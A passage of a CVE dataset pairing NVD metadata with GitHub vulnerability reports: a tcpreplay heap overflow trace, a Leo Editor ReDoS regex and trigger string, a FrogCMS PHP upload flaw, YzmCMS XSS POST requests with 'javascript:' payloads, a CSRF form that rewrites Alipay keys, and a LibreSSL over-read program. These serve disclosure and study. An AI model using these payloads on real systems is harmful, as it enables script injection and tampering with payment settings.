tcpreplay_replay /home/test/Desktop/evaulation/tcpreplay/src/tcpreplay_api.c:1136 #6 0x40fb4f in main /home/test/Desktop/evaulation/tcpreplay/src/tcpreplay.c:139 #7 0x7ffff687f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x403508 in _start (/usr/local/bin/tcpreplay-edit+0x403508) 0x60300000edf6 is located 6 bytes to the right of 32-byte region [0x60300000edd0,0x60300000edf0) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7ffff6c484fe (/usr/lib/x86_64-linux-gnu/libpcap.so.0.8+0x1f4fe) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/evaulation/tcpreplay/src/tcpedit/edit_packet.c:1032 randomize_iparp Shadow bytes around the buggy address: 0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00[fa]fa 0x0c067fff9dc0: 00 00 00 fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff9dd0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff9de0: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa 0x0c067fff9df0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fa 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==64974==ABORTING ``` Debug ```bash gef➤ ni 0x0000000000425339 1032 *ip = randomize_ipv4_addr(tcpedit, *ip); [ Legend: Modified register | Code | Heap | Stack | String ] ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── $rax : 0x000060300000edf6 → 0x00010000001802ff $rbx : 0x00007fffffffd800 → 0x00007fffffffdb80 → 0x00000ffffffffb7a → 0x0000000000000000 $rcx : 0x1 $rdx : 0x1 $rsp : 0x00007fffffffd5e0 → 0x00000001ffffd620 → 0x0000000000000000 $rbp : 0x00007fffffffd620 → 0x00007fffffffd820 → 0x00007fffffffdba0 → 0x00007fffffffdd60 → 0x00007fffffffdd90 → 0x00007fffffffde90 → 0x00007fffffffe340 → 0x000000000047c9c0 $rsi : 0x9 $rdi : 0x100 $rip : 0x0000000000425339 → <randomize_iparp+625> mov rdi, rax $r8 : 0x7 $r9 : 0x12018001ffffff86 $r10 : 0x895 $r11 : 0x00007ffff69783a0 → <ntohs+0> mov eax, edi $r12 : 0x00000ffffffffad4 → 0x0000000000000000 $r13 : 0x00007fffffffd6a0 → 0x0000000041b58ab3 $r14 : 0x00007fffffffd6a0 → 0x0000000041b58ab3 $r15 : 0x00007fffffffdbd0 → 0x0000000041b58ab3 $eflags: [carry parity adjust zero sign trap INTERRUPT direction overflow resume virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffd5e0│+0x0000: 0x00000001ffffd620 → 0x0000000000000000 ← $rsp 0x00007fffffffd5e8│+0x0008: 0x000060300000edd0 → 0x00eb5000e8000000 0x00007fffffffd5f0│+0x0010: 0x00007fffffffdac0 → 0x00000000546031b8 0x00007fffffffd5f8│+0x0018: 0x000061d00001ea80 → 0x0000000000000001 0x00007fffffffd600│+0x0020: 0x0000000effffd800 → 0x0000000000000000 0x00007fffffffd608│+0x0028: 0x000060300000edde → 0x0100001000080062 ("b"?) 0x00007fffffffd610│+0x0030: 0x000060300000edf6 → 0x00010000001802ff 0x00007fffffffd618│+0x0038: 0x000060300000edf6 → 0x00010000001802ff ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x425332 <randomize_iparp+618> ret 0xca21 0x425335 <randomize_iparp+621> test dl, dl 0x425337 <randomize_iparp+623> je 0x425341 <randomize_iparp+633> → 0x425339 <randomize_iparp+625> mov rdi, rax 0x42533c <randomize_iparp+628> call 0x402ba0 <__asan_report_load4@plt> 0x425341 <randomize_iparp+633> mov rax, QWORD PTR [rbp-0x8] 0x425345 <randomize_iparp+637> mov edx, DWORD PTR [rax] 0x425347 <randomize_iparp+639> mov rax, QWORD PTR [rbp-0x28] 0x42534b <randomize_iparp+643> mov esi, edx ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:edit_packet.c+1032 ──── 1027 memcpy(&iptemp, add_hdr, sizeof(uint32_t)); 1028 ip = &iptemp; 1029 #else 1030 ip = (uint32_t *)add_hdr; 1031 #endif // ip=0x00007fffffffd618 → [...] → 0x00010000001802ff, tcpedit=0x00007fffffffd5f8 → [...] → 0x0000000000000001 → 1032 *ip = randomize_ipv4_addr(tcpedit, *ip); 1033 #ifdef FORCE_ALIGN 1034 memcpy(add_hdr, &iptemp, sizeof(uint32_t)); 1035 #endif 1036 1037 add_hdr += arp_hdr->ar_pln + arp_hdr->ar_hln; ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "tcpreplay-edit", stopped, reason: SINGLE STEP ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x425339 → randomize_iparp(tcpedit=0x61d00001ea80, pkthdr=0x7fffffffdac0, pktdata=0x60300000edd0 "", datalink=0x1) [#1] 0x41c71c → tcpedit_packet(tcpedit=0x61d00001ea80, pkthdr=0x7fffffffd940, pktdata=0x7fffffffd8c0, direction=TCPR_DIR_C2S) [#2] 0x40963c → send_packets(ctx=0x61e00000f080, pcap=0x61600000f380, idx=0x0) [#3] 0x418e9b → replay_file(ctx=0x61e00000f080, idx=0x0) [#4] 0x417e74 → tcpr_replay_index(ctx=0x61e00000f080) [#5] 0x416de5 → tcpreplay_replay(ctx=0x61e00000f080) [#6] 0x40fb50 → main(argc=0x1, argv=0x7fffffffe490) ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ p ip $3 = (uint32_t *) 0x60300000edf6 gef➤ p *ip $4 = 0x1802ff ``` **System (please complete the following information):** - OS version : Ubuntu 16.04 - Tcpreplay Version : 4.3.2/master branch
[Bug] tcpreplay-edit ——heap-buffer-overflow in randomize_iparp at edit_packet.c:1032
https://api.github.com/repos/appneta/tcpreplay/issues/579/comments
2
2020-05-19T15:57:25Z
2020-06-01T23:58:23Z
https://github.com/appneta/tcpreplay/issues/579
621,095,649
579
2,606
CVE-2020-23478
2021-09-22T20:15:08.077
Leo Editor v6.2.1 was discovered to contain a regular expression denial of service (ReDoS) vulnerability in the component plugins/importers/dart.py.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/1333.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/leo-editor/leo-editor/issues/1597" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/1333.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/leo-editor/leo-editor/issues/1597" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:leoeditor:leo:6.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "CB8B94EA-895D-4DD4-8577-984E78AD087F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "697" ]
697
https://github.com/leo-editor/leo-editor/issues/1597
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "leo-editor", "leo-editor" ]
We are working on the [ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS) problem and detected a vulnerable regex from your code. `^\s*([\w_]+\s*)+\(` in [link](https://github.com/leo-editor/leo-editor/tree/master/leo/plugins/importers/dart.py) takes forever to match the string `"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\b"` We suggest you change the structure `([\w_]+\s*)+`, to `[\w_][\w_\s]*`. We didn’t create a pull request because we're not sure if this case is possible to take place in your program, we also do not understand the functionality of the regex as you do. Thank you for your understanding.
Regular Expression DoS vulnerabilities in plugins/importers/dart.py
https://api.github.com/repos/leo-editor/leo-editor/issues/1597/comments
3
2020-05-29T14:08:29Z
2021-09-23T09:57:39Z
https://github.com/leo-editor/leo-editor/issues/1597
627,298,157
1,597
2,607
CVE-2021-26794
2021-09-23T17:15:11.960
Privilege escalation in 'upload.php' in FrogCMS SentCMS v0.9.5 allows attacker to execute arbitrary code via crafted php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/philippe/FrogCMS/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/philippe/FrogCMS/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frogcms_project:frogcms:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "1B03397C-68B4-4C54-B001-8B5BC5FE427A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/philippe/FrogCMS/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "philippe", "FrogCMS" ]
The first step is to click the upload button <img width="1239" alt="1" src="https://user-images.githubusercontent.com/27796303/39976810-4f9aa986-5768-11e8-950b-0db3d97f02a6.png"> The second step is to upload php script <img width="516" alt="2" src="https://user-images.githubusercontent.com/27796303/39976842-915ea5fc-5768-11e8-8092-8cfa2cadf883.png"> Last successful execution <img width="848" alt="3" src="https://user-images.githubusercontent.com/27796303/39976869-ba991d58-5768-11e8-8676-9b0dd82c66e2.png"> Look at the file upload function,there is a is 'AllowedFiletype()'。 <img width="902" alt="4" src="https://user-images.githubusercontent.com/27796303/39977030-bb219b82-5769-11e8-9911-5f09a276c027.png"> follow the 'AllowedFiletype()',No judgment file type。 <img width="603" alt="5" src="https://user-images.githubusercontent.com/27796303/39977048-d067b198-5769-11e8-8554-f118f6d1402f.png">
Frog CMS 0.9.5 has a file upload Vulnerability
https://api.github.com/repos/philippe/FrogCMS/issues/11/comments
0
2018-05-14T03:28:22Z
2018-05-14T03:28:22Z
https://github.com/philippe/FrogCMS/issues/11
322,661,305
11
2,608
CVE-2020-19949
2021-09-23T20:15:07.527
A cross-site scripting (XSS) vulnerability in the /link/add.html component of YzmCMS v5.3 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/21" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.3:*:*:*:*:*:*:*", "matchCriteriaId": "20455270-91A2-45CE-9647-FCAF1055A188", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yzmcms/yzmcms/issues/21
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Cross Site Scripting Vulnerability in Latest Release V5.3 Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross-site scripting (XSS) vulnerability in banner_list.html Steps To Reproduce: 1、Login Admin System; 2、create new page url:http://127.0.0.1/yzmcms/link/link/add.html `POST http://127.0.0.1/yzmcms/link/link/add.html HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Content-Length: 137 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://127.0.0.1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://127.0.0.1/yzmcms/link/link/add.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=32ac906cf4fd00f38d9fd891eeaa3c40; yzmphp_adminid=a4afUreJXZ4pZ5mTo0F3vxcDfFM6sJ0sYQel1-p3; yzmphp_adminname=b11bhadgtkARA-vRFm900d0gCKxmI4cIz75JmY-U-o9rsIs; yzmphp_catid=8e57881gPizoimKE-eME9mjZLBndVDbBZ_1YeKHo name=%E7%99%BE%E5%BA%A6&url=javascript%3Aalert(%22xss%22)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1` ![1](https://user-images.githubusercontent.com/38708428/62461256-dc550100-b7b6-11e9-81c6-b6fcba615b9b.png) 3、Click link ![2](https://user-images.githubusercontent.com/38708428/62461257-dc550100-b7b6-11e9-9474-abf8fccbfad3.png) Release Info: V5.3
Cross Site Scripting Vulnerability in Latest Release V5.3
https://api.github.com/repos/yzmcms/yzmcms/issues/21/comments
0
2019-08-05T11:27:25Z
2019-08-12T15:31:08Z
https://github.com/yzmcms/yzmcms/issues/21
476,806,511
21
2,609
CVE-2020-19950
2021-09-23T20:15:07.577
A cross-site scripting (XSS) vulnerability in the /banner/add.html component of YzmCMS v5.3 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.3:*:*:*:*:*:*:*", "matchCriteriaId": "20455270-91A2-45CE-9647-FCAF1055A188", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yzmcms/yzmcms/issues/22
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Cross Site Scripting Vulnerability in Latest Release V5.3 Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross-site scripting (XSS) vulnerability in banner_list.html Steps To Reproduce: 1、Login Admin System; 2、create new page url:http://127.0.0.1/yzmcms/banner/banner/add.html `POST http://127.0.0.1/yzmcms/banner/banner/add.html HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Content-Length: 107 Cache-Control: max-age=0 Origin: http://127.0.0.1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://127.0.0.1/yzmcms/banner/banner/add.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=32ac906cf4fd00f38d9fd891eeaa3c40; yzmphp_adminid=a4afUreJXZ4pZ5mTo0F3vxcDfFM6sJ0sYQel1-p3; yzmphp_adminname=b11bhadgtkARA-vRFm900d0gCKxmI4cIz75JmY-U-o9rsIs; yzmphp_catid=8e57881gPizoimKE-eME9mjZLBndVDbBZ_1YeKHo title=XSS&url=javascript%3Aalert%281%29&typeid=0&image=xss&listorder=1&status=1&dosubmit=%E6%8F%90%E4%BA%A4` ![1](https://user-images.githubusercontent.com/38708428/62462952-54bdc100-b7bb-11e9-983a-8bacc8c2b3b1.png) 3、Click links ![2](https://user-images.githubusercontent.com/38708428/62462954-55565780-b7bb-11e9-978d-2897201479f7.png) Release Info: V5.3
Cross Site Scripting Vulnerability in Latest Release V5.3
https://api.github.com/repos/yzmcms/yzmcms/issues/22/comments
0
2019-08-05T11:58:43Z
2019-08-12T15:31:30Z
https://github.com/yzmcms/yzmcms/issues/22
476,819,211
22
2,610
CVE-2020-19951
2021-09-23T20:15:07.627
A cross-site request forgery (CSRF) in /controller/pay.class.php of YzmCMS v5.5 allows attackers to access sensitive components of the application.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "FF8F8058-3DAF-474C-9F13-6080D6023FD5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/yzmcms/yzmcms/issues/43
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
**Introduction** When the Administrator login in,Attackers can construct malicious POCS to fool administrator into accessing it then the APPID of Alipay, the private key of the merchant application, and the public key of Alipay can be change .Finally, a attacker can be get the profit of this website! **Vulnerable code** ``` public function edit() { //支付配置模块 if(isset($_POST['dosubmit'])) { $id = isset($_POST['id']) ? intval($_POST['id']) : 0; $config = array(); $data['enabled'] = intval($_POST['enabled']); $data['config'] = array2string($_POST['config']); if(D('pay_mode')->update($data, array('id'=>$id))){ delcache('',true); return_json(array('status'=>1,'message'=>L('operation_success'))); }else{ return_json(); //修改成功{"status":0,"message":"\u6570\u636e\u672a\u4fee\u6539\uff01"} } }else{ $id = isset($_GET['id']) ? intval($_GET['id']) : 0; $data = D('pay_mode')->where(array('id'=>$id))->find(); $config = string2array($data['config']); include $this->admin_tpl($data['template']); } } ``` **CSRF PoC** ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/yzmcms/pay/pay/edit.html" method="POST"> <input type="hidden" name="config&#91;app&#95;id&#93;" value="hack&#32;it" /> <input type="hidden" name="config&#91;merchant&#95;private&#95;key&#93;" value="hack&#32;it" /> <input type="hidden" name="config&#91;alipay&#95;public&#95;key&#93;" value="hack&#32;it" /> <input type="hidden" name="enabled" value="0" /> <input type="hidden" name="dosubmit" value="1" /> <input type="hidden" name="id" value="1" /> <input type="submit" value="See" /> </form> </body> </html> ``` **Proof** ![yzmcms_csrf1](https://user-images.githubusercontent.com/38708428/76217924-47cfe700-624e-11ea-9cd3-6c5f288d5d28.png) **Suggestion** Use the CSRFToken to protect it!
A CSRF vulnerability exists in YzmCMS V5.5
https://api.github.com/repos/yzmcms/yzmcms/issues/43/comments
0
2020-03-09T13:40:14Z
2020-05-28T15:04:40Z
https://github.com/yzmcms/yzmcms/issues/43
577,916,848
43
2,611
CVE-2021-41581
2021-09-24T03:15:06.567
x509_constraints_parse_mailbox in lib/libcrypto/x509/x509_constraints.c in LibreSSL through 3.4.0 has a stack-based buffer over-read. When the input exceeds DOMAIN_PART_MAX_LEN, the buffer lacks '\0' termination.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libressl-portable/openbsd/issues/126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libressl-portable/openbsd/issues/126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openbsd:libressl:*:*:*:*:*:*:*:*", "matchCriteriaId": "153E3E43-4F67-4598-A1BF-C8AEF4A3E5B9", "versionEndExcluding": null, "versionEndIncluding": "3.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libressl-portable/openbsd/issues/126
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libressl-portable", "openbsd" ]
The following program can make `stack-buffer-overflow`: ```c #include <err.h> #include <string.h> #include <openssl/safestack.h> #include <openssl/x509.h> #include <openssl/x509v3.h> #include "x509_internal.h" int main(int argc, char **argv) { struct x509_constraints_name name = {0}; unsigned char *mbox_name = "beck@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.a"; x509_constraints_parse_mailbox(mbox_name, strlen(mbox_name), &name); } ``` Here is the asan report: ``` ================================================================= ==3637286==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd4be82770 at pc 0x7f1f07457a6d bp 0x7ffd4be825f0 sp 0x7ffd4be81d98 READ of size 257 at 0x7ffd4be82770 thread T0 #0 0x7f1f07457a6c (/lib/x86_64-linux-gnu/libasan.so.5+0x67a6c) #1 0x5563db24dfdf in x509_constraints_parse_mailbox /root/projects/portable/crypto/x509/x509_constraints.c:361 #2 0x5563db24c987 in main 